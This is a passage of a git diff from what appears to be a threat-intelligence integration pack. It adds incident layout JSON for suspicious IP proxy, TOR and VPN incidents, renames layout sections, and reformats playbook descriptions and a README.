"y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": 
true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + 
"sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-b7871630-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "d10397a0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "d4876730-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "d7649680-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + 
"endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "d9e2b5e0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-b8235630-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "c3ae5a90-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "c62219b0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "c8f20290-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdateofdetection", + "height": 22, + "id": "cb918ca0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibsocksproxysource", + "height": 22, + "id": "54e38600-861f-11ef-a9d2-eb62a95c9def", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "ce52cf80-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": 
"relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Suspicious IP Socks Proxy Layout", + "name": "GIB Suspicious IP Socks Proxy Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_TOR_Node_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_TOR_Node_Layout.json new file mode 100644 index 000000000000..653a6f7fc096 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_TOR_Node_Layout.json 
@@ -0,0 +1,442 @@ +{ + "description": "Layout for GIB Suspicious IP TOR Node", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": 
true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + 
"sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-3c7b4ce0-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "549fdf70-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "5b671a30-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "5e6231c0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + 
"endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "61c92a80-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-401367c0-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "4778de50-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "4a1b9cb0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "4cf23c50-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "4feeb370-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Suspicious IP TOR Node Layout", + "name": "GIB Suspicious IP TOR Node Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_VPN_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_VPN_Layout.json
new file mode 100644
index 000000000000..eabc4d5ed1a2
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_VPN_Layout.json
@@ -0,0 +1,460 @@ +{ + "description": "Layout for GIB Suspicious IP VPN", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + 
"maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": 
"field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-eac47510-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "089b4ff0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "0b4428d0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "0e6f9f30-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + 
"fieldId": "gibseverity", + "height": 22, + "id": "1153ac50-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-eb54f540-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "f7145010-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "f9d6f280-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "fc4ed050-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibvpnsources", + "height": 22, + "id": "ff63ff90-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibvpnnames", + "height": 22, + "id": "02491e20-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "05211d50-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", 
+ "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Suspicious IP VPN Layout", + "name": "GIB Suspicious IP VPN Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Targeted_Malware_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Targeted_Malware_Layout.json index 29b71f43f714..75c246770e28 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Targeted_Malware_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Targeted_Malware_Layout.json @@ -383,7 +383,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, @@ -425,5 +425,7 @@ "system": false, "version": -1, "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "marketplaces": [ + "xsoar" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Victim_IP_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Victim_IP_Layout.json index b13d9c0bc1f8..9928df3e6c19 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Victim_IP_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Victim_IP_Layout.json @@ -233,7 +233,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution.yml index d6555eb8644a..fac3675faf0e 100644 
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution.yml
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution.yml
@@ -1,5 +1,4 @@
-description: Obtains additional information on the threat actor involved in the incident
- and associates related indicators to the incident.
+description: Obtains additional information on the threat actor involved in the incident and associates related indicators to the incident.
 id: Incident Postprocessing - Group-IB Threat Intelligence & Attribution
 inputs: []
 name: Incident Postprocessing - Group-IB Threat Intelligence & Attribution
@@ -143,8 +142,7 @@ tasks:
 skipunavailable: true
 task:
 brand: ""
- description: Command performs Group IB event lookup in hi/threat_actor (or in
- apt/threat_actor if the APT flag is true) collection with provided ID.
+ description: Command performs Group IB event lookup in hi/threat_actor (or in apt/threat_actor if the APT flag is true) collection with provided ID.
 id: ff71936b-d74f-4a5a-86cd-ea5ff4b610f6
 iscommand: true
 name: gibtia-get-threat-actor-info
@@ -183,8 +181,7 @@ tasks:
 skipunavailable: true
 task:
 brand: ""
- description: Command performs Group IB event lookup in hi/threat (or in apt/threat
- if the APT flag is true) collection with provided ID.
+ description: Command performs Group IB event lookup in hi/threat (or in apt/threat if the APT flag is true) collection with provided ID.
 id: 5701ade1-4390-4c6f-859e-e9a8a70758ae
 iscommand: true
 name: gibtia-get-threat-info
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution_README.md b/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution_README.md
index dca661577ac4..b7c492ee31cf 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution_README.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution_README.md @@ -1,30 +1,38 @@ Obtains additional information on the threat actor involved in the incident and associates related indicators to the incident. ## Dependencies + This playbook uses the following sub-playbooks, integrations, and scripts. ### Sub-playbooks + This playbook does not use any sub-playbooks. ### Integrations + * Group-IB Threat Intelligence ### Scripts + This playbook does not use any scripts. ### Commands + * gibtia-get-threat-actor-info * gibtia-get-threat-info * associateIndicatorsToIncident ## Playbook Inputs + --- There are no inputs for this playbook. ## Playbook Outputs + --- There are no outputs for this playbook. ## Playbook Image + --- ![Incident Postprocessing - Group-IB Threat Intelligence](../doc_files/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution.png) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/PreProcessRules/preprocessrule-4d9ca067-e506-4bcb-8ee5-fe5fb30e72d8-gib_rule.json b/Packs/GroupIB_ThreatIntelligenceAttribution/PreProcessRules/preprocessrule-4d9ca067-e506-4bcb-8ee5-fe5fb30e72d8-gib_rule.json new file mode 100644 index 000000000000..ad4722d1d1aa --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/PreProcessRules/preprocessrule-4d9ca067-e506-4bcb-8ee5-fe5fb30e72d8-gib_rule.json 
@@ -0,0 +1,89 @@
+{
+ "action": "script",
+ "enabled": true,
+ "id": "gib_rule",
+ "index": 0,
+ "itemVersion": "",
